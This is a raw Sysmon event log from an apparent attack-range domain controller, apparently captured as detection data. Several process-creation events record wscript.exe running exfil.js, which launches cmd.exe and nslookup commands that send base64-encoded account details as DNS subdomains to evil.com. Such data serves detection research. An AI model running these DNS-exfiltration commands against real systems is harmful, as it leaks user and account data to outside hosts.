14:21:46.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.161{2E1864BB-18E0-629A-6742-000000005F02}39766492C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-A345-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.166{2E1864BB-18FA-629A-A345-000000005F02}216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsgoost.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000213837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.765{00000000-0000-0000-0000-000000000000}7284<unknown process>-udptruefalse127.0.0.1-51113-false127.0.0.1-53domain 354300x8000000000000000213836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51112-false127.0.0.1-53domain 354300x8000000000000000213835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51112-false127.0.0.1-53domain 354300x8000000000000000213834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51111-false127.0.0.1-53domain 354300x8000000000000000213833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.700{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51110-false127.0.0.1-53domain 354300x8000000000000000213832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.621{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-51109-false127.0.0.1-53domain 354300x8000000000000000213831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.620{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-51108-false127.0.0.1-53domain 354300x8000000000000000213830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.619{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-51107-false127.0.0.1-53domain 354300x8000000000000000213829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.523{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-51106-false127.0.0.1-53domain 23542300x8000000000000000213828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.146{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzeipa.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-51106-false127.0.0.1-53domain 354300x8000000000000000213826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-51105-false127.0.0.1-53domain 354300x8000000000000000213825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-51105-false127.0.0.1-53domain 354300x8000000000000000213824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-51104-false127.0.0.1-53domain 354300x8000000000000000213823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-51104-false127.0.0.1-53domain 354300x8000000000000000213822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.424{00000000-0000-0000-0000-000000000000}5036<unknown process>-udpfalsefalse127.0.0.1-51103-false127.0.0.1-53domain 354300x8000000000000000213821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.424{00000000-0000-0000-0000-000000000000}5036<unknown process>-udptruefalse127.0.0.1-51103-false127.0.0.1-53domain 354300x8000000000000000213820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.424{00000000-0000-0000-0000-000000000000}5036<unknown process>-udpfalsefalse127.0.0.1-51102-false127.0.0.1-53domain 354300x8000000000000000213819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.424{00000000-0000-0000-0000-000000000000}5036<unknown process>-udptruefalse127.0.0.1-51102-false127.0.0.1-53domain 354300x8000000000000000213818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.424{00000000-0000-0000-0000-000000000000}5036<unknown process>-udpfalsefalse127.0.0.1-51101-false127.0.0.1-53domain 354300x8000000000000000213817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{00000000-0000-0000-0000-000000000000}5036<unknown process>-udptruefalse127.0.0.1-51101-false127.0.0.1-53domain 354300x8000000000000000213816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.326{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-51100-false127.0.0.1-53domain 354300x8000000000000000213815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.325{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-51100-false127.0.0.1-53domain 354300x8000000000000000213814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.325{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-51099-false127.0.0.1-53domain 354300x8000000000000000213813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.325{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-51099-false127.0.0.1-53domain 354300x8000000000000000213812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.324{00000000-0000-0000-0000-000000000000}5792<unknown process>-udpfalsefalse127.0.0.1-51098-false127.0.0.1-53domain 354300x8000000000000000213811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.324{00000000-0000-0000-0000-000000000000}5792<unknown process>-udptruefalse127.0.0.1-51098-false127.0.0.1-53domain 10341000x8000000000000000213810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.114{2E1864BB-18FA-629A-A145-000000005F02}10087364C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-A245-000000005F02}7080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.114{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.114{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A245-000000005F02}7080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.098{2E1864BB-18FA-629A-A045-000000005F02}54088036C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-A245-000000005F02}7080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.106{2E1864BB-18FA-629A-A245-000000005F02}7080C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-A045-000000005F02}5408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzeipa.tmp 2>&1 10341000x8000000000000000213802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.077{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-A145-000000005F02}1008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.077{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-A145-000000005F02}1008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.061{2E1864BB-18FA-629A-A145-000000005F02}10087364C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-A045-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.061{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A145-000000005F02}1008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.061{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.061{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.061{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.061{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A045-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.061{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.045{2E1864BB-18E0-629A-6742-000000005F02}39767256C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-A045-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.060{2E1864BB-18FA-629A-A045-000000005F02}5408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzeipa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 